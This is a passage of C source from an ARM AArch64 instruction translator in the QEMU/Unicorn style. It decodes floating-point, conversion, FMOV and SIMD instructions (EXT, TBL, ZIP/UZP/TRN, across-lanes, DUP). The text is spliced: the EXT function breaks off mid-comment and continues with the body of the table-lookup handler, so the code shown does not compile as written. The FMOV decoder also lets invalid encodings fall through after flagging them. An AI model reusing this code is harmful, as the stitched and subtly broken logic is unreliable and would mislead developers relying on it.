    gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst);

    write_fp_dreg(s, rd, tcg_res);

    tcg_temp_free_ptr(tcg_ctx, fpst);
    tcg_temp_free_i64(tcg_ctx, tcg_op1);
    tcg_temp_free_i64(tcg_ctx, tcg_op2);
    tcg_temp_free_i64(tcg_ctx, tcg_op3);
    tcg_temp_free_i64(tcg_ctx, tcg_res);
}

/* C3.6.27 Floating point data-processing (3 source)
 *   31  30  29 28       24 23  22  21  20  16  15  14  10 9    5 4    0
 * +---+---+---+-----------+------+----+------+----+------+------+------+
 * | M | 0 | S | 1 1 1 1 1 | type | o1 |  Rm  | o0 |  Ra  |  Rn  |  Rd  |
 * +---+---+---+-----------+------+----+------+----+------+------+------+
 */
static void disas_fp_3src(DisasContext *s, uint32_t insn)
{
    int type = extract32(insn, 22, 2);
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int ra = extract32(insn, 10, 5);
    int rm = extract32(insn, 16, 5);
    bool o0 = extract32(insn, 15, 1);
    bool o1 = extract32(insn, 21, 1);

    switch (type) {
    case 0:
        if (!fp_access_check(s)) {
            return;
        }
        handle_fp_3src_single(s, o0, o1, rd, rn, rm, ra);
        break;
    case 1:
        if (!fp_access_check(s)) {
            return;
        }
        handle_fp_3src_double(s, o0, o1, rd, rn, rm, ra);
        break;
    default:
        unallocated_encoding(s);
    }
}

/* C3.6.28 Floating point immediate
 *   31  30  29 28       24 23  22  21 20        13 12   10 9    5 4    0
 * +---+---+---+-----------+------+---+------------+-------+------+------+
 * | M | 0 | S | 1 1 1 1 0 | type | 1 |    imm8    | 1 0 0 | imm5 |  Rd  |
 * +---+---+---+-----------+------+---+------------+-------+------+------+
 */
static void disas_fp_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd = extract32(insn, 0, 5);
    int imm8 = extract32(insn, 13, 8);
    int is_double = extract32(insn, 22, 2);
    uint64_t imm;
    TCGv_i64 tcg_res;

    /* type field: only 0 (single) and 1 (double) are valid here */
    if (is_double > 1) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    /* The imm8 encodes the sign bit, enough bits to represent
     * an exponent in the range 01....1xx to 10....0xx,
     * and the most significant 4 bits of the mantissa; see
     * VFPExpandImm() in the v8 ARM ARM.
     */
    if (is_double) {
        /* build the top 16 bits of the double, then shift into place */
        imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) |
            (extract32(imm8, 6, 1) ? 0x3fc0 : 0x4000) |
            extract32(imm8, 0, 6);
        imm <<= 48;
    } else {
        /* build the top 16 bits of the single, then shift into place */
        imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) |
            (extract32(imm8, 6, 1) ? 0x3e00 : 0x4000) |
            (extract32(imm8, 0, 6) << 3);
        imm <<= 16;
    }

    tcg_res = tcg_const_i64(tcg_ctx, imm);
    write_fp_dreg(s, rd, tcg_res);
    tcg_temp_free_i64(tcg_ctx, tcg_res);
}

/* Handle floating point <=> fixed point conversions. Note that we can
 * also deal with fp <=> integer conversions as a special case (scale == 64)
 * OPTME: consider handling that special case specially or at least skipping
 * the call to scalbn in the helpers for zero shifts.
 */
static void handle_fpfpcvt(DisasContext *s, int rd, int rn, int opcode,
                           bool itof, int rmode, int scale, int sf, int type)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* opcode bit 0 distinguishes unsigned (1) from signed (0) forms */
    bool is_signed = !(opcode & 1);
    bool is_double = type;
    TCGv_ptr tcg_fpstatus;
    TCGv_i32 tcg_shift;

    tcg_fpstatus = get_fpstatus_ptr(tcg_ctx);

    /* scale == 64 degenerates to a plain int<->fp conversion (shift 0) */
    tcg_shift = tcg_const_i32(tcg_ctx, 64 - scale);

    if (itof) {
        /* integer (general register) to floating point */
        TCGv_i64 tcg_int = cpu_reg(s, rn);
        if (!sf) {
            /* 32-bit source: widen to 64 bits first */
            TCGv_i64 tcg_extend = new_tmp_a64(s);

            if (is_signed) {
                tcg_gen_ext32s_i64(tcg_ctx, tcg_extend, tcg_int);
            } else {
                tcg_gen_ext32u_i64(tcg_ctx, tcg_extend, tcg_int);
            }

            tcg_int = tcg_extend;
        }

        if (is_double) {
            TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx);
            if (is_signed) {
                gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int,
                                     tcg_shift, tcg_fpstatus);
            } else {
                gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int,
                                     tcg_shift, tcg_fpstatus);
            }
            write_fp_dreg(s, rd, tcg_double);
            tcg_temp_free_i64(tcg_ctx, tcg_double);
        } else {
            TCGv_i32 tcg_single = tcg_temp_new_i32(tcg_ctx);
            if (is_signed) {
                gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int,
                                     tcg_shift, tcg_fpstatus);
            } else {
                gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int,
                                     tcg_shift, tcg_fpstatus);
            }
            write_fp_sreg(s, rd, tcg_single);
            tcg_temp_free_i32(tcg_ctx, tcg_single);
        }
    } else {
        /* floating point to integer (general register) */
        TCGv_i64 tcg_int = cpu_reg(s, rd);
        TCGv_i32 tcg_rmode;

        if (extract32(opcode, 2, 1)) {
            /* There are too many rounding modes to all fit into rmode,
             * so FCVTA[US] is a special case.
             */
            rmode = FPROUNDING_TIEAWAY;
        }

        tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode));

        /* temporarily install the requested rounding mode; the old mode
         * is returned in tcg_rmode so it can be restored below
         */
        gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env);

        if (is_double) {
            TCGv_i64 tcg_double = read_fp_dreg(s, rn);
            if (is_signed) {
                if (!sf) {
                    gen_helper_vfp_tosld(tcg_ctx, tcg_int, tcg_double,
                                         tcg_shift, tcg_fpstatus);
                } else {
                    gen_helper_vfp_tosqd(tcg_ctx, tcg_int, tcg_double,
                                         tcg_shift, tcg_fpstatus);
                }
            } else {
                if (!sf) {
                    gen_helper_vfp_tould(tcg_ctx, tcg_int, tcg_double,
                                         tcg_shift, tcg_fpstatus);
                } else {
                    gen_helper_vfp_touqd(tcg_ctx, tcg_int, tcg_double,
                                         tcg_shift, tcg_fpstatus);
                }
            }
            tcg_temp_free_i64(tcg_ctx, tcg_double);
        } else {
            TCGv_i32 tcg_single = read_fp_sreg(s, rn);
            if (sf) {
                if (is_signed) {
                    gen_helper_vfp_tosqs(tcg_ctx, tcg_int, tcg_single,
                                         tcg_shift, tcg_fpstatus);
                } else {
                    gen_helper_vfp_touqs(tcg_ctx, tcg_int, tcg_single,
                                         tcg_shift, tcg_fpstatus);
                }
            } else {
                TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx);
                if (is_signed) {
                    gen_helper_vfp_tosls(tcg_ctx, tcg_dest, tcg_single,
                                         tcg_shift, tcg_fpstatus);
                } else {
                    gen_helper_vfp_touls(tcg_ctx, tcg_dest, tcg_single,
                                         tcg_shift, tcg_fpstatus);
                }
                tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest);
                tcg_temp_free_i32(tcg_ctx, tcg_dest);
            }
            tcg_temp_free_i32(tcg_ctx, tcg_single);
        }

        /* restore the previous rounding mode */
        gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env);
        tcg_temp_free_i32(tcg_ctx, tcg_rmode);

        if (!sf) {
            tcg_gen_ext32u_i64(tcg_ctx, tcg_int, tcg_int);
        }
    }

    tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus);
    tcg_temp_free_i32(tcg_ctx, tcg_shift);
}

/* C3.6.29 Floating point <-> fixed point conversions
 *   31   30  29 28       24 23  22  21 20   19 18    16 15   10 9    5 4    0
 * +----+---+---+-----------+------+---+-------+--------+-------+------+------+
 * | sf | 0 | S | 1 1 1 1 0 | type | 0 | rmode | opcode | scale |  Rn  |  Rd  |
 * +----+---+---+-----------+------+---+-------+--------+-------+------+------+
 */
static void disas_fp_fixed_conv(DisasContext *s, uint32_t insn)
{
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int scale = extract32(insn, 10, 6);
    int opcode = extract32(insn, 16, 3);
    int rmode = extract32(insn, 19, 2);
    int type = extract32(insn, 22, 2);
    bool sbit = extract32(insn, 29, 1);
    bool sf = extract32(insn, 31, 1);
    bool itof;

    /* 32-bit forms require scale >= 32 (fbits = 64 - scale <= 32) */
    if (sbit || (type > 1)
        || (!sf && scale < 32)) {
        unallocated_encoding(s);
        return;
    }

    switch ((rmode << 3) | opcode) {
    case 0x2: /* SCVTF */
    case 0x3: /* UCVTF */
        itof = true;
        break;
    case 0x18: /* FCVTZS */
    case 0x19: /* FCVTZU */
        itof = false;
        break;
    default:
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    handle_fpfpcvt(s, rd, rn, opcode, itof, FPROUNDING_ZERO, scale, sf, type);
}

static void handle_fmov(DisasContext *s, int rd, int rn, int type, bool itof)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* FMOV: gpr to or from float, double, or top half of quad fp reg,
     * without conversion.
     */

    if (itof) {
        TCGv_i64 tcg_rn = cpu_reg(s, rn);

        switch (type) {
        case 0:
        {
            /* 32 bit */
            TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx);
            tcg_gen_ext32u_i64(tcg_ctx, tmp, tcg_rn);
            tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, rd, MO_64));
            tcg_gen_movi_i64(tcg_ctx, tmp, 0);
            tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd));
            tcg_temp_free_i64(tcg_ctx, tmp);
            break;
        }
        case 1:
        {
            /* 64 bit */
            TCGv_i64 tmp = tcg_const_i64(tcg_ctx, 0);
            tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_offset(s, rd, MO_64));
            tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd));
            tcg_temp_free_i64(tcg_ctx, tmp);
            break;
        }
        case 2:
            /* 64 bit to top half.
*/ + tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); + break; + } + } else { + TCGv_i64 tcg_rd = cpu_reg(s, rd); + + switch (type) { + case 0: + /* 32 bit */ + tcg_gen_ld32u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_32)); + break; + case 1: + /* 64 bit */ + tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_64)); + break; + case 2: + /* 64 bits from top half */ + tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rn)); + break; + } + } +} + +/* C3.6.30 Floating point <-> integer conversions + * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 + * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ + * | sf | 0 | S | 1 1 1 1 0 | type | 1 | rmode | opc | 0 0 0 0 0 0 | Rn | Rd | + * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ + */ +static void disas_fp_int_conv(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 16, 3); + int rmode = extract32(insn, 19, 2); + int type = extract32(insn, 22, 2); + bool sbit = extract32(insn, 29, 1); + bool sf = extract32(insn, 31, 1); + + if (sbit) { + unallocated_encoding(s); + return; + } + + if (opcode > 5) { + /* FMOV */ + bool itof = opcode & 1; + + if (rmode >= 2) { + unallocated_encoding(s); + return; + } + + switch (sf << 3 | type << 1 | rmode) { + case 0x0: /* 32 bit */ + case 0xa: /* 64 bit */ + case 0xd: /* 64 bit to top half of quad */ + break; + default: + /* all other sf/type/rmode combinations are invalid */ + unallocated_encoding(s); + break; + } + + if (!fp_access_check(s)) { + return; + } + handle_fmov(s, rd, rn, type, itof); + } else { + /* actual FP conversions */ + bool itof = extract32(opcode, 1, 1); + + if (type > 1 || (rmode != 0 && opcode > 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + handle_fpfpcvt(s, rd, rn, opcode, itof, rmode, 64, sf, 
type); + } +} + +/* FP-specific subcases of table C3-6 (SIMD and FP data processing) + * 31 30 29 28 25 24 0 + * +---+---+---+---------+-----------------------------+ + * | | 0 | | 1 1 1 1 | | + * +---+---+---+---------+-----------------------------+ + */ +static void disas_data_proc_fp(DisasContext *s, uint32_t insn) +{ + if (extract32(insn, 24, 1)) { + /* Floating point data-processing (3 source) */ + disas_fp_3src(s, insn); + } else if (extract32(insn, 21, 1) == 0) { + /* Floating point to fixed point conversions */ + disas_fp_fixed_conv(s, insn); + } else { + switch (extract32(insn, 10, 2)) { + case 1: + /* Floating point conditional compare */ + disas_fp_ccomp(s, insn); + break; + case 2: + /* Floating point data-processing (2 source) */ + disas_fp_2src(s, insn); + break; + case 3: + /* Floating point conditional select */ + disas_fp_csel(s, insn); + break; + case 0: + switch (ctz32(extract32(insn, 12, 4))) { + case 0: /* [15:12] == xxx1 */ + /* Floating point immediate */ + disas_fp_imm(s, insn); + break; + case 1: /* [15:12] == xx10 */ + /* Floating point compare */ + disas_fp_compare(s, insn); + break; + case 2: /* [15:12] == x100 */ + /* Floating point data-processing (1 source) */ + disas_fp_1src(s, insn); + break; + case 3: /* [15:12] == 1000 */ + unallocated_encoding(s); + break; + default: /* [15:12] == 0000 */ + /* Floating point <-> integer conversions */ + disas_fp_int_conv(s, insn); + break; + } + break; + } + } +} + +static void do_ext64(DisasContext *s, TCGv_i64 tcg_left, TCGv_i64 tcg_right, + int pos) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Extract 64 bits from the middle of two concatenated 64 bit + * vector register slices left:right. The extracted bits start + * at 'pos' bits into the right (least significant) side. + * We return the result in tcg_right, and guarantee not to + * trash tcg_left. 
     */
    TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx);
    assert(pos > 0 && pos < 64);

    /* tcg_right = (right >> pos) | (left << (64 - pos)) */
    tcg_gen_shri_i64(tcg_ctx, tcg_right, tcg_right, pos);
    tcg_gen_shli_i64(tcg_ctx, tcg_tmp, tcg_left, 64 - pos);
    tcg_gen_or_i64(tcg_ctx, tcg_right, tcg_right, tcg_tmp);

    tcg_temp_free_i64(tcg_ctx, tcg_tmp);
}

/* C3.6.1 EXT
 *   31  30 29         24 23 22  21 20  16 15  14  11 10  9 5 4    0
 * +---+---+-------------+-----+---+------+---+------+---+------+------+
 * | 0 | Q | 1 0 1 1 1 0 | op2 | 0 |  Rm  | 0 | imm4 | 0 |  Rn  |  Rd  |
 * +---+---+-------------+-----+---+------+---+------+---+------+------+
 */
static void disas_simd_ext(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int is_q = extract32(insn, 30, 1);
    int op2 = extract32(insn, 22, 2);
    int imm4 = extract32(insn, 11, 4);
    int rm = extract32(insn, 16, 5);
    int rn = extract32(insn, 5, 5);
    int rd = extract32(insn, 0, 5);
    /* imm4 is a byte index; convert to a bit position */
    int pos = imm4 << 3;
    TCGv_i64 tcg_resl, tcg_resh;

    if (op2 != 0 || (!is_q && extract32(imm4, 3, 1))) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    tcg_resh = tcg_temp_new_i64(tcg_ctx);
    tcg_resl = tcg_temp_new_i64(tcg_ctx);

    /* Vd gets bits starting at pos bits into Vm:Vn. This is
     * either extracting 128 bits from a 128:128 concatenation, or
     * extracting 64 bits from a 64:64 concatenation.
then the output is the result of the lookups. Our helper
     * function does the lookup operation for a single 64 bit part of
     * the input.
     */
    tcg_resl = tcg_temp_new_i64(tcg_ctx);
    tcg_resh = tcg_temp_new_i64(tcg_ctx);

    /* TBX keeps the existing destination bytes for out-of-range
     * indices; TBL zeroes them, so start from 0 in that case.
     */
    if (is_tblx) {
        read_vec_element(s, tcg_resl, rd, 0, MO_64);
    } else {
        tcg_gen_movi_i64(tcg_ctx, tcg_resl, 0);
    }
    if (is_tblx && is_q) {
        read_vec_element(s, tcg_resh, rd, 1, MO_64);
    } else {
        tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0);
    }

    tcg_idx = tcg_temp_new_i64(tcg_ctx);
    tcg_regno = tcg_const_i32(tcg_ctx, rn);
    tcg_numregs = tcg_const_i32(tcg_ctx, len + 1);
    read_vec_element(s, tcg_idx, rm, 0, MO_64);
    gen_helper_simd_tbl(tcg_ctx, tcg_resl, tcg_ctx->cpu_env, tcg_resl, tcg_idx,
                        tcg_regno, tcg_numregs);
    if (is_q) {
        read_vec_element(s, tcg_idx, rm, 1, MO_64);
        gen_helper_simd_tbl(tcg_ctx, tcg_resh, tcg_ctx->cpu_env, tcg_resh, tcg_idx,
                            tcg_regno, tcg_numregs);
    }
    tcg_temp_free_i64(tcg_ctx, tcg_idx);
    tcg_temp_free_i32(tcg_ctx, tcg_regno);
    tcg_temp_free_i32(tcg_ctx, tcg_numregs);

    write_vec_element(s, tcg_resl, rd, 0, MO_64);
    tcg_temp_free_i64(tcg_ctx, tcg_resl);
    write_vec_element(s, tcg_resh, rd, 1, MO_64);
    tcg_temp_free_i64(tcg_ctx, tcg_resh);
}

/* C3.6.3 ZIP/UZP/TRN
 *   31  30 29         24 23  22  21 20   16 15 14 12 11 10 9    5 4    0
 * +---+---+-------------+------+---+------+---+------------------+------+
 * | 0 | Q | 0 0 1 1 1 0 | size | 0 |  Rm  | 0 | opc | 1 0 |  Rn  |  Rd  |
 * +---+---+-------------+------+---+------+---+------------------+------+
 */
static void disas_simd_zip_trn(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int rm = extract32(insn, 16, 5);
    int size = extract32(insn, 22, 2);
    /* opc field bits [1:0] indicate ZIP/UZP/TRN;
     * bit 2 indicates 1 vs 2 variant of the insn.
     */
    int opcode = extract32(insn, 12, 2);
    bool part = extract32(insn, 14, 1);
    bool is_q = extract32(insn, 30, 1);
    int esize = 8 << size;
    int i, ofs;
    int datasize = is_q ? 128 : 64;
    int elements = datasize / esize;
    TCGv_i64 tcg_res, tcg_resl, tcg_resh;

    if (opcode == 0 || (size == 3 && !is_q)) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    tcg_resl = tcg_const_i64(tcg_ctx, 0);
    tcg_resh = tcg_const_i64(tcg_ctx, 0);
    tcg_res = tcg_temp_new_i64(tcg_ctx);

    for (i = 0; i < elements; i++) {
        /* fetch the source element for result position i */
        switch (opcode) {
        case 1: /* UZP1/2 */
        {
            int midpoint = elements / 2;
            if (i < midpoint) {
                read_vec_element(s, tcg_res, rn, 2 * i + part, size);
            } else {
                read_vec_element(s, tcg_res, rm,
                                 2 * (i - midpoint) + part, size);
            }
            break;
        }
        case 2: /* TRN1/2 */
            if (i & 1) {
                read_vec_element(s, tcg_res, rm, (i & ~1) + part, size);
            } else {
                read_vec_element(s, tcg_res, rn, (i & ~1) + part, size);
            }
            break;
        case 3: /* ZIP1/2 */
        {
            int base = part * elements / 2;
            if (i & 1) {
                read_vec_element(s, tcg_res, rm, base + (i >> 1), size);
            } else {
                read_vec_element(s, tcg_res, rn, base + (i >> 1), size);
            }
            break;
        }
        default:
            g_assert_not_reached();
        }

        /* accumulate the element into the low or high 64-bit half */
        ofs = i * esize;
        if (ofs < 64) {
            tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs);
            tcg_gen_or_i64(tcg_ctx, tcg_resl, tcg_resl, tcg_res);
        } else {
            tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs - 64);
            tcg_gen_or_i64(tcg_ctx, tcg_resh, tcg_resh, tcg_res);
        }
    }

    tcg_temp_free_i64(tcg_ctx, tcg_res);

    write_vec_element(s, tcg_resl, rd, 0, MO_64);
    tcg_temp_free_i64(tcg_ctx, tcg_resl);
    write_vec_element(s, tcg_resh, rd, 1, MO_64);
    tcg_temp_free_i64(tcg_ctx, tcg_resh);
}

static void do_minmaxop(DisasContext *s, TCGv_i32 tcg_elt1, TCGv_i32 tcg_elt2,
                        int opc, bool is_min, TCGv_ptr fpst)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* Helper function for disas_simd_across_lanes: do a single precision
     *
min/max operation on the specified two inputs, + * and return the result in tcg_elt1. + */ + if (opc == 0xc) { + if (is_min) { + gen_helper_vfp_minnums(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } else { + gen_helper_vfp_maxnums(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } + } else { + assert(opc == 0xf); + if (is_min) { + gen_helper_vfp_mins(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } else { + gen_helper_vfp_maxs(tcg_ctx, tcg_elt1, tcg_elt1, tcg_elt2, fpst); + } + } +} + +/* C3.6.4 AdvSIMD across lanes + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_across_lanes(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + bool is_q = extract32(insn, 30, 1); + bool is_u = extract32(insn, 29, 1); + bool is_fp = false; + bool is_min = false; + int esize; + int elements; + int i; + TCGv_i64 tcg_res, tcg_elt; + + switch (opcode) { + case 0x1b: /* ADDV */ + if (is_u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x3: /* SADDLV, UADDLV */ + case 0xa: /* SMAXV, UMAXV */ + case 0x1a: /* SMINV, UMINV */ + if (size == 3 || (size == 2 && !is_q)) { + unallocated_encoding(s); + return; + } + break; + case 0xc: /* FMAXNMV, FMINNMV */ + case 0xf: /* FMAXV, FMINV */ + if (!is_u || !is_q || extract32(size, 0, 1)) { + unallocated_encoding(s); + return; + } + /* Bit 1 of size field encodes min vs max, and actual size is always + * 32 bits: adjust the size variable so following code can rely on it + */ + is_min = extract32(size, 1, 1); + is_fp = true; + size = 2; + break; + default: + unallocated_encoding(s); + return; + } + + if 
(!fp_access_check(s)) { + return; + } + + esize = 8 << size; + elements = (is_q ? 128 : 64) / esize; + + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_elt = tcg_temp_new_i64(tcg_ctx); + + /* These instructions operate across all lanes of a vector + * to produce a single result. We can guarantee that a 64 + * bit intermediate is sufficient: + * + for [US]ADDLV the maximum element size is 32 bits, and + * the result type is 64 bits + * + for FMAX*V, FMIN*V, ADDV the intermediate type is the + * same as the element size, which is 32 bits at most + * For the integer operations we can choose to work at 64 + * or 32 bits and truncate at the end; for simplicity + * we use 64 bits always. The floating point + * ops do require 32 bit intermediates, though. + */ + if (!is_fp) { + read_vec_element(s, tcg_res, rn, 0, size | (is_u ? 0 : MO_SIGN)); + + for (i = 1; i < elements; i++) { + read_vec_element(s, tcg_elt, rn, i, size | (is_u ? 0 : MO_SIGN)); + + switch (opcode) { + case 0x03: /* SADDLV / UADDLV */ + case 0x1b: /* ADDV */ + tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); + break; + case 0x0a: /* SMAXV / UMAXV */ + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_GEU : TCG_COND_GE, + tcg_res, + tcg_res, tcg_elt, tcg_res, tcg_elt); + break; + case 0x1a: /* SMINV / UMINV */ + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_LEU : TCG_COND_LE, + tcg_res, + tcg_res, tcg_elt, tcg_res, tcg_elt); + break; + break; + default: + g_assert_not_reached(); + } + + } + } else { + /* Floating point ops which work on 32 bit (single) intermediates. + * Note that correct NaN propagation requires that we do these + * operations in exactly the order specified by the pseudocode. 
         */
        TCGv_i32 tcg_elt1 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tcg_elt2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tcg_elt3 = tcg_temp_new_i32(tcg_ctx);
        TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx);

        /* FP across-lanes ops always reduce four 32-bit lanes */
        assert(esize == 32);
        assert(elements == 4);

        /* pairwise tree reduction: (e0 op e1) op (e2 op e3) */
        read_vec_element(s, tcg_elt, rn, 0, MO_32);
        tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt1, tcg_elt);
        read_vec_element(s, tcg_elt, rn, 1, MO_32);
        tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt2, tcg_elt);

        do_minmaxop(s, tcg_elt1, tcg_elt2, opcode, is_min, fpst);

        read_vec_element(s, tcg_elt, rn, 2, MO_32);
        tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt2, tcg_elt);
        read_vec_element(s, tcg_elt, rn, 3, MO_32);
        tcg_gen_trunc_i64_i32(tcg_ctx, tcg_elt3, tcg_elt);

        do_minmaxop(s, tcg_elt2, tcg_elt3, opcode, is_min, fpst);

        do_minmaxop(s, tcg_elt1, tcg_elt2, opcode, is_min, fpst);

        tcg_gen_extu_i32_i64(tcg_ctx, tcg_res, tcg_elt1);
        tcg_temp_free_i32(tcg_ctx, tcg_elt1);
        tcg_temp_free_i32(tcg_ctx, tcg_elt2);
        tcg_temp_free_i32(tcg_ctx, tcg_elt3);
        tcg_temp_free_ptr(tcg_ctx, fpst);
    }

    tcg_temp_free_i64(tcg_ctx, tcg_elt);

    /* Now truncate the result to the width required for the final output */
    if (opcode == 0x03) {
        /* SADDLV, UADDLV: result is 2*esize */
        size++;
    }

    switch (size) {
    case 0:
        tcg_gen_ext8u_i64(tcg_ctx, tcg_res, tcg_res);
        break;
    case 1:
        tcg_gen_ext16u_i64(tcg_ctx, tcg_res, tcg_res);
        break;
    case 2:
        tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res);
        break;
    case 3:
        break;
    default:
        g_assert_not_reached();
    }

    write_fp_dreg(s, rd, tcg_res);
    tcg_temp_free_i64(tcg_ctx, tcg_res);
}

/* C6.3.31 DUP (Element, Vector)
 *
 *   31  30 29              21 20    16 15        10 9    5 4    0
 * +---+---+-------------------+--------+-------------+------+------+
 * | 0 | Q | 0 0 1 1 1 0 0 0 0 |  imm5  | 0 0 0 0 0 1 |  Rn  |  Rd  |
 * +---+---+-------------------+--------+-------------+------+------+
 *
 * size: encoded in imm5 (see ARM ARM LowestSetBit())
 */
static void handle_simd_dupe(DisasContext *s, int is_q, int rd, int rn,
                             int imm5)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int size = ctz32(imm5);
    int esize = 8 << (size & 0x1f);
    int elements = (is_q ? 128 : 64) / esize;
    int index, i;
    TCGv_i64 tmp;

    if (size > 3 || (size == 3 && !is_q)) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    /* source lane index is the bits of imm5 above the size marker bit */
    index = imm5 >> (size + 1);

    tmp = tcg_temp_new_i64(tcg_ctx);
    read_vec_element(s, tmp, rn, index, size);

    for (i = 0; i < elements; i++) {
        write_vec_element(s, tmp, rd, i, size);
    }

    if (!is_q) {
        clear_vec_high(s, rd);
    }

    tcg_temp_free_i64(tcg_ctx, tmp);
}

/* C6.3.31 DUP (element, scalar)
 *  31                   21 20    16 15        10 9    5 4    0
 * +-----------------------+--------+-------------+------+------+
 * | 0 1 0 1 1 1 1 0 0 0 0 |  imm5  | 0 0 0 0 0 1 |  Rn  |  Rd  |
 * +-----------------------+--------+-------------+------+------+
 */
static void handle_simd_dupes(DisasContext *s, int rd, int rn,
                              int imm5)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int size = ctz32(imm5);
    int index;
    TCGv_i64 tmp;

    if (size > 3) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    index = imm5 >> (size + 1);

    /* This instruction just extracts the specified element and
     * zero-extends it into the bottom of the destination register.
+ */ + tmp = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tmp, rn, index, size); + write_fp_dreg(s, rd, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* C6.3.32 DUP (General) + * + * 31 30 29 21 20 16 15 10 9 5 4 0 + * +---+---+-------------------+--------+-------------+------+------+ + * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 1 1 | Rn | Rd | + * +---+---+-------------------+--------+-------------+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + */ +static void handle_simd_dupg(DisasContext *s, int is_q, int rd, int rn, + int imm5) +{ + int size = ctz32(imm5); + int esize = 8 << (size & 0x1f); + int elements = (is_q ? 128 : 64)/esize; + int i = 0; + + if (size > 3 || ((size == 3) && !is_q)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + for (i = 0; i < elements; i++) { + write_vec_element(s, cpu_reg(s, rn), rd, i, size); + } + if (!is_q) { + 